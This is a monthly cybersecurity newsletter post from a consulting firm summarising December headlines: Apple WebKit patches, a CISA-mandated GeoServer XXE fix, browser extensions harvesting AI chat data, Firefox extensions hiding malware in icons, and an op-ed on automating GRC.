Top 5 Cybersecurity Headlines to Know this Month
BARR Advisory Senior Consultant Sean Estrada has picked out five security and compliance headlines from the past month that you need to know. Take a look to find out what our consulting team has been reading this December—plus, scroll to see Sean’s CISO Pick of the Month for his top new resource for security and compliance professionals this month.
Update Your Apple Devices—Now
Apple has rushed out security updates for nearly all its operating systems and the Safari browser to address two WebKit vulnerabilities that were actively being exploited. One of these flaws, a memory corruption issue, is the same vulnerability that Google had already patched in its Chrome browser earlier this week. Apple said the vulnerabilities “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.”
➡️ Read more
CISA Orders Patch of GeoServer Flaw
CISA has ordered government agencies to patch a critical, actively exploited XML External Entity (XXE) injection vulnerability in GeoServer. This flaw affects GeoServer 2.26.1 and earlier versions of the open-source server for sharing geospatial data. Exploitation of this vulnerability allows unauthenticated attackers to retrieve arbitrary files from affected servers. CISA has added the flaw to its Known Exploited Vulnerabilities Catalog and mandated that federal civilian executive branch agencies patch by the end of the year due to the significant risk it poses.
➡️ Read more
“Privacy” Extensions Harvest 8M AI Chats
Security researchers from Koi found that eight “privacy” extensions for browsers including Chrome and Edge have harvested over 8 million users’ complete conversations across 10 major AI chat platforms. In one instance, the extension secretly injects code to intercept raw API traffic, capturing sensitive data that is then sold to a data broker for “marketing analytics purposes.” Given the scale and sensitivity of the data, the only mitigation is to uninstall all affected extensions immediately.
➡️ Read more
Firefox Extensions Also Pose Risks
Security researchers from Koi also recently discovered 17 Firefox extensions using steganography to hide malware inside their icons, compromising thousands of users. This sophisticated technique embeds a JavaScript loader within the icon’s raw bytes, allowing it to bypass security scanners and evade detection. Once installed, the malware operates a multi-stage infection to strip browser security and steal e-commerce commissions by redirecting affiliate links. This campaign highlights the serious risks of trusting browser add-ons and echoes Koi’s earlier warnings about “privacy” extensions secretly harvesting AI chat data.
➡️ Read more
Op-Ed: Making GRC a Strategic Advantage
Thomas Kinsella, co-founder and COO of Tines, argues in a new op-ed that reliance on manual GRC processes can’t keep up with rising complexity. He suggests that a new approach, “GRC engineering,” must be adopted to treat compliance as a strategic asset, not just an obligation. This involves shifting to an automation-first, continuous assurance model where compliance is built into daily workflows and systems from the beginning. Kinsella contends that by automating routine tasks, GRC leaders can focus on strategy and enable the business to move securely and at speed.
➡️ Read more
Sean Estrada
Senior Consultant, Cybersecurity Consulting
CISO Pick of the Month:
FedRAMP in 2025: Modernization without Compromise
“FedRAMP is evolving.” In a new video, Aaron Hamlin, practice leader of cybersecurity consulting at BARR Advisory, explains the ins and outs of FedRAMP 20x and how it’s changing the game for organizations that want to do business with the federal government. Watch now ➡️
Get The Scoop
Want to get these insights straight to your inbox? Subscribe to Take5, our monthly newsletter featuring top security and compliance headlines, events, and resources—brought to you by CISOs from BARR’s cybersecurity consulting team.